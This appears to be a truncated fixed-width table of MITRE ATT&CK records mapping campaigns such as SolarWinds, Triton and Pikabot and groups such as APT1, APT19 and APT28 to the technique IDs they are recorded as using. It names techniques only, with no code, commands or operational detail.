C0022 Operation campaign- campaign uses T1622 Debugger Eattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1087.002Domain Acattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1583.001Domains attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1584.001Domains attack-pat technique For [Operat
C0022 Operation campaign- campaign uses T1585.002Email Accoattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1027.013Encrypted/attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1041 Exfiltratio attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1567.002Exfiltratio attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1070.004File Deleti attack-pat technique During [Op
C0022 Operation campaign- campaign uses T1083 File and Di attack-pat technique During [Op
C0022 Operation campaign- campaign uses T1589 Gather Victattack-pat technique For [Operat
C0022 Operation campaign- campaign uses T1591 Gather Vic attack-pat technique For [Operat
C0022 Operation campaign- campaign uses T1505.004IIS Componattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1591.004Identify Roattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1656 Impersonatattack-pat technique During [Op
C0022 Operation campaign- campaign uses T1105 Ingress Tooattack-pat technique During [Op
C0022 Operation campaign- campaign uses T1534 Internal Spattack-pat technique During [Op
C0022 Operation campaign- campaign uses T1204.002Malicious Fattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1204.001Malicious Lattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1587.001Malware attack-pat technique For [Operat
C0022 Operation campaign- campaign uses T1036.008Masquerade attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1106 Native API attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1059.001PowerShellattack-pat technique During [Op
C0022 Operation campaign- campaign uses T1547.001Registry Ruattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1218.010Regsvr32 attack-pat technique During [Op
C0022 Operation campaign- campaign uses T1218.011Rundll32 attack-pat technique During [Op
C0022 Operation campaign- campaign uses T1053.005Scheduled attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1583.004Server attack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1584.004Server attack-pat technique For [Operat
C0022 Operation campaign- campaign uses T1593.001Social Medattack-pat technique For [Operat
C0022 Operation campaign- campaign uses T1585.001Social Medattack-pat technique For [Operat
C0022 Operation campaign- campaign uses T1027.002Software Pattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1566.001Spearphishattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1566.002Spearphishattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1566.003Spearphishiattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1573.001Symmetric attack-pat technique During [Op
C0022 Operation campaign- campaign uses T1497.001System Cheattack-pat technique During [Op
C0022 Operation campaign- campaign uses T1614.001System Lanattack-pat technique During [Op
C0022 Operation campaign- campaign uses T1221 Template Iattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1497.003Time Basedattack-pat technique During [Op
C0022 Operation campaign- campaign uses T1588.002Tool attack-pat technique For [Operat
C0022 Operation campaign- campaign uses T1608.001Upload Maattack-pat technique For [Opera
C0022 Operation campaign- campaign uses T1608.002Upload Tooattack-pat technique For [Operat
C0022 Operation campaign- campaign uses T1059.005Visual Basiattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1071.001Web Protocattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1583.006Web Servicattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1059.003Windows Cattack-pat technique During [Ope
C0022 Operation campaign- campaign uses T1047 Windows M attack-pat technique During [Op
C0022 Operation campaign- campaign uses T1220 XSL Script attack-pat technique During [Op
C0016 Operation campaign--campaign uses T1140 Deobfuscatattack-pat technique During [Op
C0016 Operation campaign--campaign uses T1583.001Domains attack-pat technique For [Operat
C0016 Operation campaign--campaign uses T1189 Drive-by C attack-pat technique During [Ope
C0016 Operation campaign--campaign uses T1568 Dynamic Reattack-pat technique For [Operat
C0016 Operation campaign--campaign uses T1585.002Email Accoattack-pat technique For [Operat
C0016 Operation campaign--campaign uses T1027.013Encrypted/attack-pat technique During [Ope
C0016 Operation campaign--campaign uses T1203 Exploitatioattack-pat technique During [Ope
C0016 Operation campaign--campaign uses T1059.007JavaScript attack-pat technique During [Ope
C0016 Operation campaign--campaign uses T1204.002Malicious Fattack-pat technique During [Ope
C0016 Operation campaign--campaign uses T1204.001Malicious Lattack-pat technique During [Ope
C0016 Operation campaign--campaign uses T1036 Masqueradattack-pat technique For [Operat
C0016 Operation campaign--campaign uses T1218.005Mshta attack-pat technique During [Ope
C0016 Operation campaign--campaign uses T1518 Software Dattack-pat technique During [Ope
C0016 Operation campaign--campaign uses T1027.002Software Pattack-pat technique For [Operat
C0016 Operation campaign--campaign uses T1566.001Spearphishattack-pat technique During [Op
C0016 Operation campaign--campaign uses T1566.002Spearphishattack-pat technique During [Ope
C0016 Operation campaign--campaign uses T1059.005Visual Basiattack-pat technique During [Ope
C0023 Operation campaign- campaign uses T1102.002Bidirectio attack-pat technique For [Opera
C0023 Operation campaign- campaign uses T1078.002Domain Acattack-pat technique For [Opera
C0023 Operation campaign- campaign uses T1583.001Domains attack-pat technique For [Operat
C0023 Operation campaign- campaign uses T1587.001Malware attack-pat technique For [Operat
C0023 Operation campaign- campaign uses T1585.001Social Medattack-pat technique For [Opera
C0023 Operation campaign- campaign uses T1027.003Steganogr attack-pat technique During [Op
C0023 Operation campaign- campaign uses T1001.002Steganogr attack-pat technique During [Op
C0023 Operation campaign- campaign uses T1546.003Windows Ma attack-pat technique During [Op
C0006 Operation campaign- campaign uses T1560.001Archive viaattack-pat technique During [Ope
C0006 Operation campaign- campaign uses T1548.002Bypass Useattack-pat technique During [Op
C0006 Operation campaign- campaign uses T1553.002Code Signi attack-pat technique During [Op
C0006 Operation campaign- campaign uses T1005 Data from attack-pat technique During [Op
C0006 Operation campaign- campaign uses T1140 Deobfuscatattack-pat technique During [Op
C0006 Operation campaign- campaign uses T1588.004Digital Certattack-pat technique For [Opera
C0006 Operation campaign- campaign uses T1583.001Domains attack-pat technique During [Op
C0006 Operation campaign- campaign uses T1585.002Email Accoattack-pat technique During [Ope
C0006 Operation campaign- campaign uses T1027.013Encrypted/attack-pat technique During [Op
C0006 Operation campaign- campaign uses T1041 Exfiltratio attack-pat technique During [Ope
C0006 Operation campaign- campaign uses T1070.004File Deleti attack-pat technique During [Ope
C0006 Operation campaign- campaign uses T1071.002File Transf attack-pat technique During [Ope
C0006 Operation campaign- campaign uses T1083 File and Di attack-pat technique During [Ope
C0006 Operation campaign- campaign uses T1105 Ingress Tooattack-pat technique During [Op
C0006 Operation campaign- campaign uses T1074.001Local Data attack-pat technique During [Op
C0006 Operation campaign- campaign uses T1204.002Malicious Fattack-pat technique During [Op
C0006 Operation campaign- campaign uses T1036 Masqueradattack-pat technique During [Op
C0006 Operation campaign- campaign uses T1036.005Match Legiattack-pat technique During [Op
C0006 Operation campaign- campaign uses T1112 Modify Regattack-pat technique During [Ope
C0006 Operation campaign- campaign uses T1106 Native API attack-pat technique During [Op
C0006 Operation campaign- campaign uses T1057 Process Di attack-pat technique During [Ope
C0006 Operation campaign- campaign uses T1583.004Server attack-pat technique For [Operat
C0006 Operation campaign- campaign uses T1569.002Service Ex attack-pat technique During [Op
C0006 Operation campaign- campaign uses T1574.011Services R attack-pat technique During [Ope
C0006 Operation campaign- campaign uses T1082 System Inf attack-pat technique During [Op
C0006 Operation campaign- campaign uses T1059.005Visual Basiattack-pat technique For [Opera
C0006 Operation campaign- campaign uses T1059.003Windows Cattack-pat technique During [Op
C0006 Operation campaign- campaign uses T1543.003Windows Se attack-pat technique During [Op
C0013 Operation campaign- campaign uses T1559.002Dynamic Daattack-pat technique During [Op
C0013 Operation campaign- campaign uses T1105 Ingress Tooattack-pat technique During [Op
C0013 Operation campaign- campaign uses T1204.002Malicious Fattack-pat technique During [Ope
C0013 Operation campaign- campaign uses T1587.001Malware attack-pat technique For [Opera
C0013 Operation campaign- campaign uses T1036.005Match Legiattack-pat technique During [Ope
C0013 Operation campaign- campaign uses T1106 Native API attack-pat technique During [Ope
C0013 Operation campaign- campaign uses T1055 Process Injattack-pat technique During [Op
C0013 Operation campaign- campaign uses T1090 Proxy attack-pat technique For [Operat
C0013 Operation campaign- campaign uses T1547.001Registry Ruattack-pat technique During [Op
C0013 Operation campaign- campaign uses T1584.004Server attack-pat technique For [Opera
C0013 Operation campaign- campaign uses T1608.001Upload Maattack-pat technique For [Opera
C0013 Operation campaign- campaign uses T1059.005Visual Basiattack-pat technique During [Op
C0013 Operation campaign- campaign uses T1583.006Web Servicattack-pat technique For [Opera
C0005 Operation campaign- campaign uses T1059 Command attack-pat
an technique For [Operat
C0005 Operation campaign- campaign uses T1140 Deobfuscatattack-pat technique For [Operat
C0005 Operation campaign- campaign uses T1583.001Domains attack-pat technique For [Operat
C0005 Operation campaign- campaign uses T1568 Dynamic Reattack-pat technique For [Operat
C0005 Operation campaign- campaign uses T1027.013Encrypted/attack-pat technique For [Operat
C0005 Operation campaign- campaign uses T1204.002Malicious Fattack-pat technique During [Ope
C0005 Operation campaign- campaign uses T1204.001Malicious Lattack-pat technique During [Ope
C0005 Operation campaign- campaign uses T1588.001Malware attack-pat technique For [Operat
C0005 Operation campaign- campaign uses T1218.011Rundll32 attack-pat technique During [Ope
C0005 Operation campaign- campaign uses T1027.002Software Pattack-pat technique For [Operat
C0005 Operation campaign- campaign uses T1566.001Spearphishattack-pat technique During [Ope
C0005 Operation campaign- campaign uses T1566.002Spearphishattack-pat technique During [Ope
C0005 Operation campaign- campaign uses T1027.003Steganogr attack-pat technique For [Operat
C0005 Operation campaign- campaign uses T1588.002Tool attack-pat technique For [Operat
C0005 Operation campaign- campaign uses T1608.001Upload Maattack-pat technique For [Operat
C0005 Operation campaign- campaign uses T1497 Virtualiza attack-pat technique During [Ope
C0005 Operation campaign- campaign uses T1102 Web Servicattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1560.001Archive viaattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1573.002Asymmetricattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1119 Automatedattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1070.001Clear Windattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1115 Clipboard attack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1027.010Command aOttack-pat technique During [Op
C0014 Operation campaign- campaign uses T1003.006DCSync attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1001 Data Obfusattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1005 Data from attack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1562.004Disable or attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1087.002Domain Acattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1078.002Domain Acattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1585.002Email Accoattack-pat technique For [Opera
C0014 Operation campaign- campaign uses T1041 Exfiltratio attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1190 Exploit Pubattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1133 External R attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1070.004File Deleti attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1083 File and Di attack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1589 Gather Victattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1027.005Indicator attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1105 Ingress Tooattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1090.001Internal Prattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1016.001Internet C attack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1558.003Kerberoastattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1056.001Keyloggingattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1003.001LSASS Memattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1570 Lateral Tooattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1078.003Local Acco attack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1074.001Local Data attack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1069.001Local Grouattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1587.001Malware attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1036.005Match Legiattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1112 Modify Regattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1111 Multi-Factoattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1090.003Multi-hop attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1106 Native API attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1046 Network Seattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1135 Network Shattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1095 Non-Applicattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1571 Non-Standaattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1555.005Password attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1120 Peripheral attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1059.001PowerShellattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1552.004Private Keyattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1057 Process Di attack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1055 Process Injattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1090 Proxy attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1059.006Python attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1012 Query Regiattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1018 Remote Sysattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1021.002SMB/Windo attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1053.005Scheduled attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1518.001Security S attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1583.004Server attack-pat technique For [Opera
C0014 Operation campaign- campaign uses T1569.002Service Ex attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1518 Software Dattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1082 System Inf attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1016 System Netattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1049 System Netattack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1033 System Own attack-pat technique During [Op
C0014 Operation campaign- campaign uses T1007 System Serattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1124 System Timattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1588.002Tool attack-pat technique For [Operat
C0014 Operation campaign- campaign uses T1078 Valid Acco attack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1059.005Visual Basiattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1071.001Web Protocattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1505.003Web Shell attack-pat technique During [Ope
C0014 Operation campaign- campaign uses T1059.003Windows Cattack-pat technique During [Op
C0014 Operation campaign- campaign uses T1047 Windows M attack-pat technique During [Op
C0036 Pikabot Discampaign--campaign uses T1574 Hijack Exe attack-pat technique [Pikabot Di
C0036 Pikabot Discampaign--campaign uses T1059.007JavaScript attack-pat technique [Pikabot Di
C0036 Pikabot Discampaign--campaign uses T1059.001PowerShellattack-pat technique [Pikabot Di
C0036 Pikabot Discampaign--campaign uses T1566.002Spearphishattack-pat technique [Pikabot Di
C0024 SolarWind campaign- campaign uses T1087 Account Diattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1098.001Additional attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1098.003Additional attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1098.002Additional attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1550.001Applicatio attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1560.001Archive viaattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1070.008Clear Mail attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1078.004Cloud Accoattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1213.003Code Reposattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1553.002Code Signi attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1195.002Compromise attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1589.001Credentialsattack-pat technique For the [So
C0024 SolarWind campaign- campaign uses T1555 Credential attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1555.003Credential attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1003.006DCSync attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1213 Data from attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1005 Data from attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1140 Deobfuscatattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1098.005Device Regiattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1562.002Disable Wiattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1562.004Disable or attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1562.001Disable or attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1087.002Domain Acattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1078.002Domain Acattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1069.002Domain Grattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1482 Domain Truattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1583.001Domains attack-pat technique For the [S
C0024 SolarWind campaign- campaign uses T1584.001Domains attack-pat technique For the [S
C0024 SolarWind campaign- campaign uses T1568 Dynamic Reattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1048.002Exfiltrati attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1190 Exploit Pubattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1133 External R attack-pat technique For the [S
C0024 SolarWind campaign- campaign uses T1070.004File Deleti attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1083 File and Di attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1665 Hide Infrasattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1070 Indicator attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1105 Ingress Tooattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1090.001Internal Prattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1016.001Internet C attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1558.003Kerberoastattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1078.003Local Acco attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1587.001Malware attack-pat technique For the [S
C0024 SolarWind campaign- campaign uses T1036.004Masquerade attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1036.005Match Legiattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1069 Permissionattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1059.001PowerShellattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1552.004Private Keyattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1057 Process Di attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1074.002Remote Datattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1021.001Remote Des attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1114.002Remote Ema attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1018 Remote Sysattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1218.011Rundll32 attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1606.002SAML Tokeattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1021.002SMB/Windo attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1053.005Scheduled attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1539 Steal Web attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1082 System Inf attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1070.006Timestompattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1484.002Trust Modifattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1199 Trusted Relattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1550 Use Altern attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1078 Valid Acco attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1059.005Visual Basiattack-pat technique For the [S
C0024 SolarWind campaign- campaign uses T1606.001Web Cookiattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1071.001Web Protocattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1550.004Web Sessioattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1059.003Windows Cattack-pat technique During the
C0024 SolarWind campaign- campaign uses T1047 Windows M attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1546.003Windows Ma attack-pat technique During the
C0024 SolarWind campaign- campaign uses T1021.006Windows Rattack-pat technique During the
C0030 Triton Saf campaign--campaign uses T1595 Active Sca attack-pat technique In the [Tri
C0030 Triton Saf campaign--campaign uses T1573 Encrypted attack-pat technique In the [Tri
C0030 Triton Saf campaign--campaign uses T1027.005Indicator attack-pat technique In the [Tri
C0030 Triton Saf campaign--campaign uses T1003.001LSASS Memattack-pat technique In the [Tr
C0030 Triton Saf campaign--campaign uses T1587.001Malware attack-pat technique In the [Tri
C0030 Triton Saf campaign--campaign uses T1036.005Match Legiattack-pat technique In the [Tri
C0030 Triton Saf campaign--campaign uses T1059.001PowerShellattack-pat technique In the [Tri
C0030 Triton Saf campaign--campaign uses T1053.005Scheduled attack-pat technique In the [Tri
C0030 Triton Saf campaign--campaign uses T1588.002Tool attack-pat technique In the [Tr
C0030 Triton Saf campaign--campaign uses T1056.003Web Portalattack-pat technique In the [Tri
C0039 Versa Direccampaign--campaign uses T1573.002Asymmetricattack-pat technique [Versa Dir
C0039 Versa Direccampaign--campaign uses T1190 Exploit Pubattack-pat technique [Versa Dire
C0039 Versa Direccampaign--campaign uses T1056 Input Capt attack-pat technique [Versa Dire
C0039 Versa Direccampaign--campaign uses T1587.001Malware attack-pat technique [Versa Dir
C0039 Versa Direccampaign--campaign uses T1584.008Network Deattack-pat technique [Versa Dire
C0039 Versa Direccampaign--campaign uses T1095 Non-Applicattack-pat technique [Versa Dire
C0039 Versa Direccampaign--campaign uses T1071.001Web Protocattack-pat technique [Versa Dir
C0039 Versa Direccampaign--campaign uses T1505.003Web Shell attack-pat technique [Versa Dire
C0037 Water Curupcampaign- campaign uses T1140 Deobfuscatattack-pat technique [Water Curu
C0037 Water Curupcampaign- campaign uses T1589.002Email Addrattack-pat technique [Water Curu
C0037 Water Curupcampaign- campaign uses T1105 Ingress Tooattack-pat technique [Water Curu
C0037 Water Curupcampaign- campaign uses T1059.007JavaScript attack-pat technique [Water Curu
C0037 Water Curupcampaign- campaign uses T1204.002Malicious Fattack-pat technique [Water Curu
C0037 Water Curupcampaign- campaign uses T1204.001Malicious Lattack-pat technique [Water Curu
C0037 Water Curupcampaign- campaign uses T1218.011Rundll32 attack-pat technique [Water Curu
C0037 Water Curupcampaign- campaign uses T1566.001Spearphishattack-pat technique [Water Curu
C0037 Water Curupcampaign- campaign uses T1204 User Execuattack-pat technique [Water Curu
C0037 Water Curupcampaign- campaign uses T1059.003Windows Cattack-pat technique [Water Curu
G0099 APT-C-36 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT-C-36]
G0099 APT-C-36 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT-C-36]
G0099 APT-C-36 intrusion- group uses T1036.004Masquerade attack-pat technique [APT-C-36](
G0099 APT-C-36 intrusion- group uses T1571 Non-Standaattack-pat technique [APT-C-36]
G0099 APT-C-36 intrusion- group uses T1027 Obfuscatedattack-pat technique [APT-C-36]
G0099 APT-C-36 intrusion- group uses T1053.005Scheduled attack-pat technique [APT-C-36](
G0099 APT-C-36 intrusion- group uses T1566.001Spearphishattack-pat technique [APT-C-36]
G0099 APT-C-36 intrusion- group uses T1588.002Tool attack-pat technique [APT-C-36]
G0099 APT-C-36 intrusion- group uses T1059.005Visual Basiattack-pat technique [APT-C-36]
G0006 APT1 intrusion- group uses T1560.001Archive viaattack-pat technique [APT1](htt
G0006 APT1 intrusion- group uses T1119 Automatedattack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1005 Data from attack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1583.001Domains attack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1584.001Domains attack-pat technique [APT1](htt
G0006 APT1 intrusion- group uses T1585.002Email Accoattack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1003.001LSASS Memattack-pat technique [APT1](htt
G0006 APT1 intrusion- group uses T1087.001Local Acco attack-pat technique [APT1](htt
G0006 APT1 intrusion- group uses T1114.001Local Emailattack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1588.001Malware attack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1036.005Match Legiattack-pat technique The file n
G0006 APT1 intrusion- group uses T1135 Network Shattack-pat technique [APT1](htt
G0006 APT1 intrusion- group uses T1550.002Pass the H attack-pat technique The [APT1]
G0006 APT1 intrusion- group uses T1057 Process Di attack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1021.001Remote Des attack-pat technique The [APT1](
G0006 APT1 intrusion- group uses T1114.002Remote Ema attack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1566.001Spearphishattack-pat technique [APT1](htt
G0006 APT1 intrusion- group uses T1566.002Spearphishattack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1016 System Netattack-pat technique [APT1](htt
G0006 APT1 intrusion- group uses T1049 System Netattack-pat technique [APT1](htt
G0006 APT1 intrusion- group uses T1007 System Serattack-pat technique [APT1](htt
G0006 APT1 intrusion- group uses T1588.002Tool attack-pat technique [APT1](http
G0006 APT1 intrusion- group uses T1059.003Windows Cattack-pat technique [APT1](htt
G0005 APT12 intrusion- group uses T1102.002Bidirectio attack-pat technique [APT12](ht
G0005 APT12 intrusion- group uses T1568.003DNS Calculattack-pat technique [APT12](htt
G0005 APT12 intrusion- group uses T1203 Exploitatioattack-pat technique [APT12](htt
G0005 APT12 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT12](ht
G0005 APT12 intrusion- group uses T1566.001Spearphishattack-pat technique [APT12](ht
G0023 APT16 intrusion- group uses T1584.004Server attack-pat technique [APT16](htt
G0025 APT17 intrusion- group uses T1585 Establish attack-pat technique [APT17](htt
G0025 APT17 intrusion- group uses T1583.006Web Servicattack-pat technique [APT17](htt
G0026 APT18 intrusion- group uses T1053.002At attack-pat technique [APT18](htt
G0026 APT18 intrusion- group uses T1071.004DNS attack-pat technique [APT18](ht
G0026 APT18 intrusion- group uses T1027.013Encrypted/attack-pat technique [APT18](htt
G0026 APT18 intrusion- group uses T1133 External R attack-pat technique [APT18](htt
G0026 APT18 intrusion- group uses T1070.004File Deleti attack-pat technique [APT18](htt
G0026 APT18 intrusion- group uses T1083 File and Di attack-pat technique [APT18](htt
G0026 APT18 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT18](htt
G0026 APT18 intrusion- group uses T1547.001Registry Ruattack-pat technique [APT18](ht
G0026 APT18 intrusion- group uses T1082 System Inf attack-pat technique [APT18](ht
G0026 APT18 intrusion- group uses T1078 Valid Acco attack-pat technique [APT18](htt
G0026 APT18 intrusion- group uses T1071.001Web Protocattack-pat technique [APT18](ht
G0026 APT18 intrusion- group uses T1059.003Windows Cattack-pat technique [APT18](ht
G0073 APT19 intrusion- group uses T1027.010Command aOttack-pat technique [APT19](ht
G0073 APT19 intrusion- group uses T1059 Command attack-pat
an technique [APT19](ht
G0073 APT19 intrusion- group uses T1574.002DLL Side-L attack-pat technique [APT19](htt
G0073 APT19 intrusion- group uses T1140 Deobfuscatattack-pat technique An [APT19](
G0073 APT19 intrusion- group uses T1189 Drive-by C attack-pat technique [APT19](ht
G0073 APT19 intrusion- group uses T1027.013Encrypted/attack-pat technique [APT19](ht
G0073 APT19 intrusion- group uses T1564.003Hidden Wi attack-pat technique [APT19](ht
G0073 APT19 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT19](htt
G0073 APT19 intrusion- group uses T1112 Modify Regattack-pat technique [APT19](htt
G0073 APT19 intrusion- group uses T1059.001PowerShellattack-pat technique [APT19](ht
G0073 APT19 intrusion- group uses T1547.001Registry Ruattack-pat technique An [APT19]
G0073 APT19 intrusion- group uses T1218.010Regsvr32 attack-pat technique [APT19](htt
G0073 APT19 intrusion- group uses T1218.011Rundll32 attack-pat technique [APT19](htt
G0073 APT19 intrusion- group uses T1566.001Spearphishattack-pat technique [APT19](htt
G0073 APT19 intrusion- group uses T1132.001Standard Eattack-pat technique An [APT19]
G0073 APT19 intrusion- group uses T1082 System Inf attack-pat technique [APT19](ht
G0073 APT19 intrusion- group uses T1016 System Netattack-pat technique [APT19](ht
G0073 APT19 intrusion- group uses T1033 System Own attack-pat technique [APT19](htt
G0073 APT19 intrusion- group uses T1588.002Tool attack-pat technique [APT19](htt
G0073 APT19 intrusion- group uses T1071.001Web Protocattack-pat technique [APT19](ht
G0073 APT19 intrusion- group uses T1543.003Windows Se attack-pat technique An [APT19](
G0007 APT28 intrusion- group uses T1098.002Additional attack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1550.001Applicatio attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1560 Archive Coattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1560.001Archive viaattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1119 Automatedattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1102.002Bidirectio attack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1542.003Bootkit attack-pat technique [APT28](htt
